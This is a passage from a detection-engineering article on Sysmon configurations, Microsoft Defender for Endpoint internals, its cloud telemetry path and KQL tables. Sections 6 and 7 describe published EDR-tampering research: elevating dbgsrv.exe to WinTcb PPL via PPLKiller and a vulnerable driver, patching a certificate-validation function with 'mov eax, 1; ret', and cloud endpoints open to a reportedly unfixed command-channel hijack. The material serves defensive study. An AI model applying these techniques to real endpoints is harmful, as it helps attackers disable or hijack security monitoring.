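    exe_path = os.path.join(workdir, "tool.exe")
    logged = copy_file(b"MZ\x90\x00 fake PE body", exe_path)
    exe_survived = os.path.exists(exe_path)

    txt_path = os.path.join(workdir, "notes.txt")
    text_logged = copy_file(b"plain text", txt_path)
    text_survived = os.path.exists(txt_path)
```

From the caller's side the executable copy looks successful, which matches the "no error on the command line" observation in Hartong's writeup.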

This is a confined preventive surface, and it should not be confused with the much larger Defender exploit-protection blocking surface. Defender exploit protection mitigations include arbitrary-code-guard, control-flow-guard enforcement, and ASR rules -- they sit inside the Defender Antivirus and MDE stacks. EID 27's blocking is one Sysmon minifilter making a close-time decision about newly written executables; it is not a general-purpose application-allow-list, and it is not a substitute for Windows Defender Application Control. Both writeups are explicit about the scope: Hartong refers to "the FileBlockExecutable event", and Diversenok's introduction reads "the update introduced the first preventive measure -- the FileBlockExecutable event (ID 27)" [@diversenok-2022].

Twenty-nine events, four hardening releases, one schema. The catalogue is only useful if you configure Sysmon to emit subsets of it, and configuration is where the field's three lineages diverged.

5. Three Canonical Sysmon Configurations

Every production Sysmon deployment in the field is forked from one of three repositories. The lineage matters, and one of the things this article fixes is a common attribution error -- "Florian Roth wrote the canonical Sysmon config" is in widespread circulation, but the canonical root is SwiftOnSecurity's repository, and Roth's repo is a 2018 fork of it.

Sigma: The open-source generic signature format authored by Florian Roth and his collaborators at Nextron Systems; the SIEM-and-EDR field's vendor-neutral detection-rule lingua franca. The `SigmaHQ/sigma` repository ships over 3,000 detection rules covering the Windows kernel-callback surface (heavily Sysmon-aware), Linux audit, macOS unified log, AWS CloudTrail, Microsoft 365, and other event sources. Sigma rules are written once and compiled by community converters into the per-tool query languages (KQL for Defender XDR / Sentinel, SPL for Splunk, EQL for Elastic) [@github-sigma].

SwiftOnSecurity/sysmon-config (February 2017)

The historical root. The pseudonymous account SwiftOnSecurity published the first widely-cited Sysmon configuration template on February 1, 2017 per the GitHub REST API [@github-swiftonsecurity-meta]. The README's design intent is the single sentence still printed at the top of the repo: "This is a Microsoft Sysinternals Sysmon configuration file template with default high-quality event tracing" [@github-swiftonsecurity]. The template emphasises clarity over coverage; the XML is heavily commented, and the rule structure follows a deliberately conservative pattern of <Include> blocks per technique.

SwiftOnSecurity's config is the most-cited starting point for Sysmon deployments worldwide and the one that detection-engineering tutorials default to. It is also the parent of the NextronSystems repository in the literal GitHub-fork sense: the GitHub REST API for NextronSystems/sysmon-config returns SwiftOnSecurity/sysmon-config as the parent, and the historical fork graph shows other community configs descending from it as well [@github-nextronsystems-meta].

Neo23x0/sysmon-config, now NextronSystems/sysmon-config (January 2018, renamed 2021)

Florian Roth, working under his GitHub handle @Neo23x0, forked SwiftOnSecurity's config in January 2018 and merged the community pull-request set; blocking-rule support followed once Sysmon v14 introduced it in 2022. The README's design intent reads: "This is a forked and modified version of @SwiftOnSecurity's sysmon config. ... We merged most of the 30+ open pull requests" [@github-neo23x0]. The maintainer roster as of the present writing is Florian Roth (@Neo23x0), Tobias Michalski (@humpalum), Christian Burkard (@phantinuss), and Nasreddine Bencherchali (@nas_bench).

The repository ships a blocking variant, sysmonconfig-export-block.xml, that adds <RuleGroup> blocks targeting EID 27 (FileBlockExecutable) and EID 28 (FileBlockShredding) for the most common malware-staging file paths. This is the variant SOC teams deploy when they want Sysmon's preventive surface to participate in the response pipeline as a hard block rather than as a detection-only artifact.

The legacy URL `https://github.com/Neo23x0/sysmon-config` now HTTP-301 redirects to `https://github.com/NextronSystems/sysmon-config`. The GitHub REST API for the current repository returns `created_at: 2021-07-24T06:19:41Z` with `parent: SwiftOnSecurity/sysmon-config`, which means the repository as it now exists was created in mid-2021 when Florian Roth moved it from his personal handle to his employer's organization namespace [@github-nextronsystems-meta]. The content lineage from SwiftOnSecurity is unchanged; the move is an organizational one. The exact pre-rename creation date of the original `Neo23x0/sysmon-config` repository is not reliably retrievable from the current API and is best dated as January 2018 based on the README and the fork-history.
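The lineage check described above can be reproduced against GitHub's "get a repository" endpoint. The sketch below assumes the standard `created_at`, `fork`, and `parent.full_name` response fields; the helper names are illustrative, and the offline sample uses only the two values quoted in the text (`fork: true` is an assumption implied by the presence of a parent).

```javascript
// Summarise fork lineage from a GitHub repository JSON document.
function summarizeLineage(repo) {
  return {
    name: repo.full_name,
    createdAt: repo.created_at,
    isFork: Boolean(repo.fork),
    parent: repo.parent ? repo.parent.full_name : null,
  };
}

// Optional live lookup. Needs network access; unauthenticated calls are
// rate-limited. Not invoked in this sketch.
async function fetchLineage(fullName) {
  const res = await fetch(`https://api.github.com/repos/${fullName}`, {
    headers: { Accept: "application/vnd.github+json" },
  });
  if (!res.ok) throw new Error(`GitHub API returned ${res.status}`);
  return summarizeLineage(await res.json());
}

// Offline sample built from the values cited in the article.
const sample = {
  full_name: "NextronSystems/sysmon-config",
  created_at: "2021-07-24T06:19:41Z",
  fork: true, // assumption: implied by the parent field being present
  parent: { full_name: "SwiftOnSecurity/sysmon-config" },
};

const lineage = summarizeLineage(sample);
console.log(lineage);
```

Calling `fetchLineage("NextronSystems/sysmon-config")` from an environment with network access would return the live values; the result may differ from the sample if the repository metadata changes.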

olafhartong/sysmon-modular (January 13, 2018)

Olaf Hartong's sysmon-modular was created on January 13, 2018 per the GitHub REST API [@github-hartong-meta]. The repository's design takes a different shape from the monolithic SwiftOnSecurity and NextronSystems configs: instead of one carefully-tuned XML, Hartong publishes a per-EID-per-technique module library that compiles into one of five pre-generated artifacts plus an arbitrary number of custom builds [@github-hartong-modular]. The pre-generated variants are:

sysmonconfig.xml -- the default deployment baseline.
sysmonconfig-with-filedelete.xml -- default plus the EID 23 archive variant of file delete, which preserves the deleted file in C:\Sysmon\ (volume-cost trade-off; recommend dedicated drive).
sysmonconfig-excludes-only.xml -- the verbose variant, which captures everything except a small set of well-known exclusions; useful for detection-engineering R&D on a single host.
sysmonconfig-research.xml -- the super-verbose variant, with the README's standing warning: "really DO NOT USE IN PRODUCTION!" -- this is for live-malware-sample analysis in a sandbox, not for fleet rollout.
sysmonconfig-mde-augment.xml -- the variant whose entire design intent is to augment Microsoft Defender for Endpoint's collection surface "to have as little overlap as possible" with what MDE already captures [@github-hartong-modular].

The MDE-augment config is the artifact this article keeps returning to. It is the operational answer -- maintained by a person, not by Microsoft -- to the question of which Sysmon events are worth collecting on a host that already has MDE installed. We will return to its specific contents in §10. For now, the key observation is that this config exists because of a documented absence: Microsoft has not published a per-ActionType cross-walk between MDE's Device* schema and Sysmon's manifest, so Hartong reverse-engineered one.

Side-by-side comparison

| Dimension | SwiftOnSecurity/sysmon-config | NextronSystems/sysmon-config (formerly Neo23x0) | olafhartong/sysmon-modular |
| --- | --- | --- | --- |
| Author / org | SwiftOnSecurity (pseudonymous) | Florian Roth + Nextron Systems team | Olaf Hartong (and FalconForce collaborators) |
| Created | Feb 1, 2017 | Forked Jan 2018; renamed Jul 24, 2021 | Jan 13, 2018 |
| Distribution | One monolithic XML | Two XMLs (audit + blocking) | Modular per-technique + five pre-generated builds |
| Design philosophy | Quality starting point, conservative | Community-maintained, blocking-aware | Tunable modular, MITRE ATT&CK-mapped |
| Best used for | First-time Sysmon deployment | Standalone Sysmon at scale | Sysmon alongside MDE, or per-team customization |
| Pre-generated v14+ blocking | No (audit only) | Yes (`sysmonconfig-export-block.xml`) | Yes (built from blocking modules) |
| MDE coexistence variant | No | No | Yes (`sysmonconfig-mde-augment.xml`) |

Choosing among the three

The detection-engineering trade-off framing is short. Pick SwiftOnSecurity when you want a clean, well-commented starting point and you are not yet sure which events you actually need. Pick NextronSystems when you want a community-maintained baseline that already has the blocking rules for Sysmon v14+. Pick Hartong when you want fine-grained per-technique tunability or, more commonly, when you are running MDE and need Sysmon to augment rather than duplicate it.

Tactical caution worth one inline note: Sysmon supports one active configuration at a time. There is no aggregate-multiple-XMLs feature at the driver layer. Hartong's modular approach generates a single merged XML at build time; the production fleet receives that single XML and the driver enforces it. If you are trying to run two configurations side by side -- one for the SOC's hunting, one for the platform team's audit -- pick one, merge the rules, and ship the combined product. The deployment tooling in sysmon-modular is built around exactly this constraint.
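The "pick one, merge the rules, ship the combined product" step can be pictured as a plain data merge. The sketch below is not the sysmon-modular tooling and does not emit Sysmon XML; the module shape (`eventType`, `onmatch`, `rules`) and the rule strings are hypothetical placeholders chosen only to show de-duplication into a single rule set.

```javascript
// Merge rule modules from several teams into one combined rule set.
// Rules are grouped by (eventType, onmatch) and de-duplicated.
function mergeModules(modules) {
  const merged = new Map(); // "EventType|onmatch" -> Set of rule strings
  for (const m of modules) {
    const key = `${m.eventType}|${m.onmatch}`;
    if (!merged.has(key)) merged.set(key, new Set());
    for (const rule of m.rules) merged.get(key).add(rule);
  }
  return [...merged.entries()].map(([key, rules]) => {
    const [eventType, onmatch] = key.split("|");
    return { eventType, onmatch, rules: [...rules] };
  });
}

// Hypothetical inputs: one module set per team.
const socHunting = [
  { eventType: "ProcessAccess", onmatch: "include", rules: ["TargetImage is lsass.exe"] },
];
const platformAudit = [
  {
    eventType: "ProcessAccess",
    onmatch: "include",
    rules: ["TargetImage is lsass.exe", "TargetImage is winlogon.exe"],
  },
  { eventType: "PipeEvent", onmatch: "include", rules: ["PipeName contains example"] },
];

// One combined product, which is what the single active configuration requires.
const combined = mergeModules([...socHunting, ...platformAudit]);
console.log(JSON.stringify(combined, null, 2));
```

A real merge also has to reconcile conflicting include and exclude rules for the same event type, which this sketch deliberately ignores.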

All three configurations assume the same thing: either Sysmon is the only EDR on the host (a deployment posture that exists in air-gapped, regulatory-no-cloud, or unlicensed environments) or it is augmenting an EDR whose collection surface is known. The augment case is the one where the field has converged on Hartong. To understand why, we have to look at what the other EDR -- Microsoft's own -- actually collects on the host.

6. Microsoft Defender for Endpoint: The Documented On-Host Surface

Two questions about MDE have very different answers. "What does Microsoft Defender for Endpoint run on this host?" has a primary-source-quality answer from Microsoft Learn. "What does it actually do?" has only a community-observed answer. The documented surface is the user-mode component inventory plus registry hives and event sources. The community-observed surface includes the kernel-callback inventory, the cloud TLS-pinning details, and the inter-process communication paths -- none of which Microsoft has published. Naming both halves with the right citations on each side is one of the few things this article does that other writeups skip.

The documented surface (Microsoft Learn, primary)

On every onboarded Windows endpoint, Microsoft Defender for Endpoint installs and runs a Windows service named Sense, whose display name is "Microsoft Defender for Endpoint Service" and whose backing executable is MsSense.exe. The on-host troubleshooting page documents the canonical health-check command: sc query sense [@sense-troubleshoot]. On Windows Server 2019, Server 2022, Server 2025, and Azure Stack HCI 23H2 or later, MDE is delivered as a Feature on Demand with the capability name Microsoft.Windows.Sense.Client~~~~. Microsoft documents the verification command verbatim: "DISM.EXE /Online /Get-CapabilityInfo /CapabilityName:Microsoft.Windows.Sense.Client~~~~" [@sense-troubleshoot][@ms-server-endpoints-learn].

Onboarding state is recorded under two registry hives that Microsoft Learn names explicitly:

HKLM\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection -- the policy-driven configuration surface.
HKLM\SOFTWARE\Microsoft\Windows Advanced Threat Protection\Status -- the run-time onboarding state.

Onboarding diagnostics land in the WDATPOnboarding event source under the Application event log, with documented event IDs 5, 10, 15, 30, 35, 40, 65, and 70, each of which corresponds to a specific failure mode with a specific resolution procedure [@sense-troubleshoot]. The product installs to C:\Program Files\Windows Defender Advanced Threat Protection\ (the legacy path is preserved even after the September 2020 rebrand).

The documented surface stops here. Microsoft Learn names MsSense.exe, the Sense service, the registry hives, the event source, the Feature on Demand, and the four operating systems. Microsoft Learn does not publish a kernel-callback inventory for the MDE EDR sensor.

The community-observed surface

Past the documented boundary, what is in field-published primary sources is the user-mode binary inventory and the cloud-side TLS path. Three companion binaries sit alongside MsSense.exe:

SenseCncProxy.exe is the cloud-command-and-control proxy. This is the binary that holds the TLS connection out to Defender XDR ingest, applies the certificate-pinning policy, and shuttles agent-bound commands (live-response actions, custom-detection-rule pushes, sensor-configuration updates) back down to MsSense.exe.
SenseIR.exe is the live-response and investigation actions binary. When a SOC analyst clicks Run script or Collect investigation package in the Defender XDR portal, SenseIR.exe is the process that fulfils the request on the endpoint side.
SenseNdr.exe is the network detection and response component, responsible for endpoint-side enrichment of network observations used in the DeviceNetworkEvents table.

These binaries are not enumerated on Microsoft Learn in the same way the Sense service itself is. They are documented in MDE incident-response runbooks, in third-party reverse-engineering posts, and in the file-system signature data on any onboarded endpoint. The article treats their existence as community-observed. SenseIR.exe is corroborated by InfoGuard 2025's reverse-engineering of MDE's live-response cloud path [@infoguard-2025]; SenseNdr.exe in particular lacks an explicit community primary writeup as of 2026 -- its role here is inferred from its on-disk binary metadata and the file-system signature data on onboarded endpoints.

The kernel-side surface MDE shares with Defender Antivirus is documented in the Defender Antivirus product line [@ms-defender-av-arch]:

WdBoot.sys is the Early-Launch Antimalware (ELAM) driver. It is the first non-Windows driver to load at boot and gates which non-ELAM drivers are allowed to load after it. It is signed with the Antimalware Extended Key Usage, 1.3.6.1.4.1.311.61.4.1 [@ms-learn-elam-sample].
WdFilter.sys is the Defender Antivirus file-system minifilter. It sits alongside SysmonDrv.sys at a different Filter Manager altitude.
WdNisDrv.sys is the Network Inspection System driver, which provides the host-firewall-augmenting NIS layer.

Protected Process Light (PPL): A Windows process-protection level, introduced in Vista (as Protected Process, for DRM) and extended in Windows 8.1 (for antimalware), that prevents user-mode debugger attach, code injection, and `OpenProcess` for write from any caller that does not itself run at an equal or higher PPL signer level. Antimalware-PPL (`PROTECTED_ANTIMALWARE_LIGHT`) is the level reserved for security products signed with the Antimalware EKU; `MsSense.exe` and Sysmon v15+ both run at this level.

Early-Launch Antimalware (ELAM): The Windows boot-order privilege that lets a driver signed with the Antimalware EKU `1.3.6.1.4.1.311.61.4.1` [@ms-learn-elam-sample] load before any non-ELAM driver and classify subsequent boot-start drivers as `Good`, `Bad`, or `Unknown` so the kernel can decide which to load. The ELAM driver *itself* is measured (along with the bootloader, kernel, and other early-boot artefacts) into TPM PCRs by Windows's *Measured Boot*, which is a separate boot-integrity feature; ELAM's job is to classify, not to measure. Defender Antivirus's `WdBoot.sys` is the canonical ELAM driver. Sysmon's `SysmonDrv.sys` is *not* ELAM-signed; this is the pre-driver-load horizon discussed in §12.

Antimalware EKU: The Authenticode Extended Key Usage `1.3.6.1.4.1.311.61.4.1` [@ms-learn-elam-sample], issued by Microsoft to security vendors after a code-signing and behavioral review. The EKU gates two distinct things: ELAM signing eligibility (so the driver loads first) and Antimalware-PPL eligibility for the user-mode service (so the service is harder to tamper with). MDE's `MsSense.exe`, Defender Antivirus's `MsMpEng.exe`, and Sysmon v15+ all carry this signature path.

Antimalware-PPL on MsSense.exe

The MsSense.exe service runs as Antimalware-PPL -- PROTECTED_ANTIMALWARE_LIGHT in the kernel data structure. The protection level prevents an attacker with SYSTEM privileges from attaching a user-mode debugger, suspending the service, or injecting code into its address space using ordinary Windows debugging or code-injection APIs. This is the same protection level Sysmon v15+ runs at, and it is the same level Defender Antivirus's MsMpEng.exe has run at since Windows 8.1. The structural defense closes user-mode tampering as a class. The residual attack surface is kernel-mode primitives -- which is what FalconForce had to use in 2022 to debug MDE [@falconforce-2022].

The dispositive reverse-engineering primary: FalconForce 2022

Olaf Hartong and Henri Hambartsumyan, working at FalconForce, published the most-cited reverse-engineering writeup of MDE's on-host architecture in 2022. The post's TL;DR captures both the debug-bypass technique and the cloud vulnerability that resulted from applying it:

"You can debug MDE running on an endpoint by running `dbgsrv.exe` and raising its PPL protection to WinTcb. This can be used to snoop on data being transmitted by MDE to the cloud. We identified a vulnerability related to missing authorization checks of data sent from the MDE endpoint to the M365 cloud, allowing anyone to send spoofed data to any M365 tenant."

The technique is precise [@falconforce-2022]. FalconForce raised the PPL signer level of Windows's PE debug server (dbgsrv.exe) to WinTcb -- a signer level higher than Antimalware-PPL -- and used the elevated debug server to attach to MsSense.exe. From inside that debug session they instrumented SspiCli!EncryptMessage, the SSPI function MDE's cloud transport uses to wrap each outbound message before TLS encryption, and captured the plaintext payloads. The plaintext capture surfaced CVE-2022-23278: a missing-authorization vulnerability in which the M365 cloud trusted whatever device-identifying claims the endpoint asserted, with no cross-check that the asserting endpoint owned the device identity it claimed [@msrc-cve-2022-23278][@nvd-cve-2022-23278]. Microsoft patched the vulnerability on March 8, 2022, with a public acknowledgement to FalconForce: "Microsoft released a security update to address CVE-2022-23278 in Microsoft Defender for Endpoint. This important class spoofing vulnerability impacts all platforms. We wish to thank Falcon Force for the collaboration on addressing this issue through coordinated vulnerability disclosure" [@msrc-cve-2022-23278].

Note: The kernel-and-Defender-Antivirus surface MDE shares (WdBoot.sys ELAM, WdFilter.sys minifilter, WdNisDrv.sys NIS) is documented. The specific callback inventory the MDE EDR sensor itself registers is not. The community's best-published primary for what MsSense.exe actually does is the FalconForce 2022 reverse-engineering writeup -- and it covers a narrow slice (TLS interception and one cloud-authorization bug), not a full callback list. The Hartong sysmonconfig-mde-augment.xml config exists as a community-curated artifact precisely because Microsoft has not published a per-ActionType-to-per-kernel-callback cross-walk. The most-cited operational config in the field is downstream of a documentation gap. This is the second aha moment of the article.

Putting the on-host pieces together

flowchart TD
    B["WdBoot.sys (ELAM, Antimalware EKU)"] -.boot order.-> F["WdFilter.sys (file minifilter)"]
    B -.boot order.-> N["WdNisDrv.sys (Network Inspection)"]
    F --> M["MsSense.exe (Antimalware-PPL aggregator)"]
    N --> M
    M --> IR["SenseIR.exe (Live Response)"]
    M --> NDR["SenseNdr.exe (Network Detection)"]
    M --> P["SenseCncProxy.exe (cloud forwarder)"]
    P -- "TLS + certificate pinning" --> C["Defender XDR ingest (regional Kusto)"]

The picture is asymmetric: the kernel-driver substrate at the top is documented in the Defender Antivirus product line; the user-mode service inventory in the middle is documented for MsSense.exe and partly documented for the companion binaries; the cloud transport at the bottom is documented at the API-contract level (TLS, certificate pinning) but the specific endpoints and the on-the-wire payload format are reverse-engineered. The community-published primaries -- FalconForce 2022 above the line, InfoGuard Labs 2025 below it -- are how the field knows what it knows about the cloud-bound payload, which is the next layer.

7. The Cloud Pipeline: SenseCncProxy.exe to Defender XDR Ingest

The wire between MsSense.exe and Microsoft's cloud is TLS with certificate pinning. It is also, twice in the last four years, the place where the most interesting Defender for Endpoint vulnerabilities have lived. The 2022 round closed one of them. The 2025 round is still open as of this article's writing.

Certificate pinning and the FalconForce 2022 method

MsSense.exe does not trust whatever the Windows certificate store says about the chain to Defender XDR ingest. It pins the certificate. FalconForce's bypass is the one §6 already named: raise dbgsrv.exe to WinTcb PPL, attach the elevated debug server to MsSense.exe, and instrument SspiCli!EncryptMessage to capture the plaintext payload before TLS encryption [@falconforce-2022]. The specific PPL elevation technique is published in the same writeup. PPLKiller's /enablePPL patch sets the protected-process-light type in dbgsrv.exe's _EPROCESS.Protection field and pairs it with the WinTcb signer level. The result: a PE debug server running at a PPL level above Antimalware-PPL, with OpenProcess rights against any Antimalware-PPL target [@falconforce-2022]. This requires SYSTEM plus a kernel primitive, typically delivered via BYOVD.
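The _EPROCESS.Protection value is a single byte, and decoding it shows why a WinTcb-level debug server can open an Antimalware-PPL target. The sketch below assumes the commonly documented `PS_PROTECTION` layout (low three bits for type, one audit bit, high four bits for signer). The access check is a deliberately simplified ordinal comparison that follows this article's "equal or higher signer level" wording; the kernel's actual decision uses a dominance table rather than a numeric comparison.

```javascript
// Assumed PS_PROTECTION layout: Type (3 bits) | Audit (1 bit) | Signer (4 bits).
const TYPE = { None: 0, ProtectedLight: 1, Protected: 2 };
const SIGNER = {
  None: 0, Authenticode: 1, CodeGen: 2, Antimalware: 3,
  Lsa: 4, Windows: 5, WinTcb: 6,
};

function encodeProtection(type, signer) {
  return ((signer & 0x0f) << 4) | (type & 0x07);
}

function decodeProtection(level) {
  return {
    type: level & 0x07,
    audit: (level >> 3) & 0x01,
    signer: (level >> 4) & 0x0f,
  };
}

// Simplified model only: the caller needs an equal or higher type and signer.
function canOpenForWrite(callerLevel, targetLevel) {
  const caller = decodeProtection(callerLevel);
  const target = decodeProtection(targetLevel);
  if (target.type === TYPE.None) return true; // unprotected target
  return caller.type >= target.type && caller.signer >= target.signer;
}

const msSense = encodeProtection(TYPE.ProtectedLight, SIGNER.Antimalware);
const dbgsrvElevated = encodeProtection(TYPE.ProtectedLight, SIGNER.WinTcb);
const systemShell = encodeProtection(TYPE.None, SIGNER.None);

console.log(msSense.toString(16), dbgsrvElevated.toString(16));
console.log(canOpenForWrite(systemShell, msSense));    // unprotected SYSTEM caller
console.log(canOpenForWrite(dbgsrvElevated, msSense)); // WinTcb-light caller
```

Under this model an unprotected SYSTEM process is refused while the elevated debug server is allowed, which is the asymmetry the FalconForce technique relies on.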

The InfoGuard Labs 2025 follow-up took a different route to the same problem. Instead of reading plaintext before TLS encryption, InfoGuard patches the certificate-chain validation function in memory so the endpoint certificate is no longer checked at all. Any local TLS-stripping proxy can then intercept the wire. The verbatim patch is two CPU instructions written into CRYPT32!CertVerifyCertificateChainPolicy: "mov eax, 1; ret" -- which forces the function to return success without performing any actual chain check [@infoguard-2025].

With the pinning gate disabled, InfoGuard's team observed the on-the-wire protocol. The cloud-bound payload goes to two endpoint families: /edr/commands/cnc for command-and-control and /senseir/v1/actions/ for live-response actions. The vulnerability they then disclosed is that both endpoint families accept "data sent from the MDE endpoint to the cloud ... without validating authentication tokens, allowing a post-breach attacker with a machine's ID to hijack the command-and-control channel" [@infoguard-2025]. Microsoft's response, verbatim: "All findings were reported to the Microsoft Security Response Center (MSRC) in July 2025. However, Microsoft has classified them as low severity and has not committed to a fix" [@infoguard-2025].

FalconForce 2022 found a missing-authorization bug in the cloud's trust path. CVE-2022-23278 was patched. InfoGuard Labs 2025 found a different missing-authorization pattern in different cloud endpoints -- different bug, same class -- and the disclosure record says Microsoft has not committed to a fix. The cloud trusts whatever the endpoint claims about itself far enough that the same authorization gap keeps surfacing. The arc that began with the March 2022 spoofing-CVE patch is not closed. This is the third aha moment of the article, surfaced again in §11.
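The bug class is simple enough to sketch in a few lines. The example below is entirely hypothetical: it does not reproduce Microsoft's protocol, endpoints, or token format, and every name in it is invented for illustration. It only contrasts a handler that trusts the device identity a request asserts with one that binds the identity to the credential presented.

```javascript
// Hypothetical token store: bearer token -> device the token was issued for.
const issuedTokens = new Map([
  ["token-A", "device-A"],
  ["token-B", "device-B"],
]);

// Missing-authorization pattern: the claimed identity is accepted as-is.
function acceptTrusting(request) {
  return { accepted: true, actingAs: request.claimedDeviceId };
}

// Bound pattern: the claimed identity must match the token's owner.
function acceptBound(request) {
  const owner = issuedTokens.get(request.token);
  if (owner === undefined) {
    return { accepted: false, reason: "unknown token" };
  }
  if (owner !== request.claimedDeviceId) {
    return { accepted: false, reason: "token not issued for claimed device" };
  }
  return { accepted: true, actingAs: owner };
}

// device-B's credential is used to speak as device-A.
const spoofed = { token: "token-B", claimedDeviceId: "device-A" };
const legitimate = { token: "token-A", claimedDeviceId: "device-A" };

console.log(acceptTrusting(spoofed)); // accepted, acting as device-A
console.log(acceptBound(spoofed));    // rejected
console.log(acceptBound(legitimate)); // accepted
```

The two disclosures differ in which endpoints and claims were affected, but both reduce to the first handler's shape: the server acts on an identity it never verified.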

What the cloud does on arrival

Once SenseCncProxy.exe has TLS-shipped the event over the wire to the regional Defender XDR ingest endpoint, two things happen on the cloud side. First, the event lands in the Advanced Hunting Kusto cluster. Microsoft Learn's verbatim freshness claim is: "Advanced hunting receives this data almost immediately after the sensors that collect them successfully transmit it to the corresponding cloud services" [@advanced-hunting-overview]. "Almost immediately" is empirically a few seconds in steady state, which is exactly what Maya saw in §1: a row with Timestamp three seconds in the past.

Second, the event is replicated for use by Microsoft's built-in detection rules, MITRE-mapped queries, and the cross-domain correlation surface that joins endpoint events to email events, identity events, and cloud-application events. The cross-domain join is one of the most-cited reasons enterprises stay on the licensed product rather than fall back to standalone Sysmon: KQL can join DeviceProcessEvents to EmailEvents to IdentityLogonEvents in one query, and Sysmon-only deployments cannot do that without a separate SIEM doing the cross-source enrichment.

Data residency is documented at the regional level in the MDE configure-server-endpoints page: "data is stored in the US for customers in the USA; in EU for European customers; and in the UK for customers in the United Kingdom" [@ms-server-endpoints-learn]. Retention in-portal is the same quota for all geographies: "Advanced hunting is a query-based threat hunting tool that you use to explore up to 30 days of raw data" [@advanced-hunting-overview]. Past 30 days, the customer has to extend the retention surface via Microsoft Sentinel's per-table archiving, which is the operational story §9 picks up.

The event's journey, end to end

sequenceDiagram
    participant K as Kernel callback (WdFilter or SysmonDrv)
    participant S as MsSense.exe (Antimalware-PPL)
    participant P as SenseCncProxy.exe
    participant CP as CRYPT32!CertVerifyCertificateChainPolicy
    participant C as Defender XDR ingest (regional Kusto)
    participant Q as DeviceProcessEvents table
    K->>S: Synchronous callback notification
    Note over S: Enrich (parent PID, hashes, identity, ProcessGuid)
    S->>S: SspiCli!EncryptMessage (FalconForce 2022 plaintext capture point)
    S->>P: IPC to cloud forwarder
    P->>CP: Validate Defender XDR certificate chain
    CP-->>P: Pinned chain OK (InfoGuard 2025 bypass: patch CP to return 1 unconditionally)
    P->>C: HTTPS POST /edr/commands/cnc or /senseir/v1/actions/
    C->>Q: Write into Kusto cluster
    Note over Q: "Almost immediately" -- seconds end to end
    Q-->>K: Queryable via KQL

The diagram is annotated with the two community-disclosed interception points because they are the two places the field has actually been able to observe what is on the wire. Between SspiCli!EncryptMessage (where the plaintext payload exists) and CRYPT32!CertVerifyCertificateChainPolicy (where the certificate chain gets validated), the path is otherwise opaque to external researchers. The Microsoft-published side of the story is the contractual one: TLS, certificate pinning, regional ingest, Kusto cluster, KQL exposure. The reverse-engineered side fills in the rest.

Within seconds, the event appears as a row in DeviceProcessEvents. The reader-side schema is where the analyst lives. So: what columns?

8. Six `Device*` Tables and One Worked KQL Query

Every detection rule in Microsoft Defender XDR, every hunting query in Microsoft Sentinel, and every analyst pivot Maya does on her console is a KQL query against six load-bearing tables. Knowing those six tables is the price of admission to the Defender XDR field.

Kusto Query Language (KQL): Microsoft's data-explorer query language, originally built for Azure Data Explorer (formerly Kusto). KQL reads as a pipeline of operators -- `where`, `project`, `summarize`, `join`, `order by` -- left to right. Advanced Hunting in Microsoft Defender XDR and analytics queries in Microsoft Sentinel both expose the same KQL dialect; the same query text can be moved between the two surfaces with only the table-name namespace changing [@advanced-hunting-overview][@sentinel-xdr-connector].

The six tables

The six tables that this article calls "load-bearing" are the ones that map most cleanly to Sysmon's manifest and that detection rules join against most often:

DeviceProcessEvents -- the canonical reader-side analogue of Sysmon's EID 1 (ProcessCreate) and EID 5 (ProcessTerminate). The schema reference page names roughly fifty columns including Timestamp, DeviceId, DeviceName, ActionType, FileName, FolderPath, SHA1, SHA256, MD5, FileSize, ProcessId, ProcessCommandLine, ProcessIntegrityLevel, ProcessTokenElevation, ProcessCreationTime, AccountSid, AccountName, AccountUpn, LogonId, and the full InitiatingProcess* family of parent-process columns [@deviceprocessevents-table].
DeviceNetworkEvents -- the analogue of Sysmon EID 3 (NetworkConnect) plus EID 22 (DNSEvent) and the MDE-only network-protection telemetry. Columns include RemoteIP, RemotePort, RemoteUrl, LocalIP, LocalPort, Protocol, RemoteIPType, and the InitiatingProcess* family [@sentinel-xdr-connector].
DeviceFileEvents -- the analogue of Sysmon EIDs 11 (FileCreate), 15 (FileCreateStreamHash), 23 (FileDelete archived), and 26 (FileDeleteDetected).
DeviceImageLoadEvents -- the analogue of Sysmon EID 7 (ImageLoad).
DeviceRegistryEvents -- the analogue of Sysmon EIDs 12-14 (RegistryEvent family).
DeviceEvents -- the miscellaneous catch-all. AMSI scan results, exploit-protection events, ASR rule fires, Network Protection blocks, and other MDE-specific events that do not fit cleanly into any of the per-event-class tables surface here as ActionType discriminators.

Past the six core tables there are siblings the article does not walk in detail but that detection engineers query alongside: DeviceLogonEvents (interactive, remote-interactive, network logons), DeviceFileCertificateInfo (Authenticode signer information), DeviceInfo and DeviceNetworkInfo (asset and posture). The cross-domain tables that the Defender XDR portal exposes -- AlertInfo, AlertEvidence, IdentityLogonEvents, EmailEvents, CloudAppEvents -- are also queryable from the same surface, and the cross-domain join is one of the load-bearing reasons SOC teams move queries from a standalone SIEM into Advanced Hunting [@sentinel-xdr-connector].

Sysmon EID to MDE table cross-walk

The cross-walk is the table detection engineers actually need at their desk. Every row is a Sysmon EID, the MDE table the analogous event lands in, the ActionType discriminator inside that table, and a fidelity rating relative to Sysmon's manifest -- because the MDE schema does not surface every Sysmon field, and the fidelity gaps are where Hartong's MDE-augment config earns its keep.

| Sysmon EID | MDE table | ActionType | Fidelity vs Sysmon | Hartong-augment disposition |
| --- | --- | --- | --- | --- |
| 1 ProcessCreate | DeviceProcessEvents | ProcessCreated | Full | Drop (MDE covers) |
| 3 NetworkConnect | DeviceNetworkEvents | ConnectionSuccess | Full | Drop |
| 7 ImageLoad | DeviceImageLoadEvents | ImageLoaded | Full | Drop |
| 8 CreateRemoteThread | DeviceEvents | RemoteThreadCreated | Truncated (no SourceImage hash) | Keep verbose |
| 9 RawAccessRead | (none) | -- | Omitted | Keep |
| 10 ProcessAccess | DeviceEvents | OpenProcessApiCall | Truncated (no GrantedAccess mask) | Keep verbose, narrow targets |
| 11 FileCreate | DeviceFileEvents | FileCreated | Full | Drop |
| 12-14 RegistryEvent | DeviceRegistryEvents | RegistryValueSet etc. | Full | Drop |
| 17-18 PipeEvent | (none) | -- | Omitted | Keep |
| 19-21 WmiEvent | (none) | -- | Omitted | Keep |
| 22 DNSEvent | DeviceNetworkEvents | DnsQuery | Full | Drop |
| 23 FileDelete (archive) | DeviceFileEvents | FileDeleted | Partial (no archive) | Keep archive variant on selected paths |
| 26 FileDeleteDetected | DeviceFileEvents | FileDeleted | Full | Drop |
| 27 FileBlockExecutable | (none) | -- | Omitted (MDE has separate prevent surface) | Keep if Sysmon is enforcing |

